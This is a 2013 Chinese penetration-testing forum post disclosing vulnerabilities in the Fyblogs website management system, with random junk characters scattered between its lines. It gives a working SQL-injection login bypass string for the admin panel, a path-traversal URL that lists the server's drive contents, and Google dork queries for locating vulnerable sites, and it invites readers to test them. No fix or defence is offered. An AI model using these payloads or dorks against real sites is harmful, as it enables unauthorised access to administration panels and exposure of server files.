中国网络渗透测试联盟

标题: Fyblogs网站管理系统漏洞 [打印本页]
作者: admin    时间: 2013-3-7 13:07
标题: Fyblogs网站管理系统漏洞
漏洞类型: 未授权访问/权限绕过
. }; D5 R6 o/ k5 |  i6 w7 Q" p2 e& b) l: s/ f- c6 ]2 |9 H
简要描述:3 r  O4 ?1 Z" Y8 q

9 F1 _: v: |1 \" X+ kFyblogs网站管理系统,,后台存在万能密码,后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
8 \0 k$ z$ ], j5 C& N
: A4 h2 t9 X( S( g! d详细说明:
- W& q" _& |# ]" l# B8 I9 K7 Q7 h7 W9 W: [8 i7 q
后台万能密码 'or'='or'6 y- Y5 O0 T0 _" a
后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
2 R% H  }" ~, u% n3 C8 O- P  Z8 iadmin/uploadfile.asp?currentFolder=/upfiles/../
% H. b0 d. W) @$ N3 `$ v2 b  w( j) f8 X9 f1 X# {- w' j6 K: [
漏洞证明:# m* r; Z( W" E

- l5 J4 g& y  `0 t( _谷歌:inurl:type.asp?id=1 新闻中心& {8 a, n" G9 g0 A4 S9 V
或者 :inurl:download_ok.asp?& I" Z8 P" e3 d+ Y' \: X
8 B: K7 Q) S# I# F7 A7 I
可以测试
8 t/ N' `2 |! _  S8 ?
" m$ |7 K4 z4 t, ^9 z/ D+ c! M
* ~% H1 k3 F0 a4 ]; @/ E



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2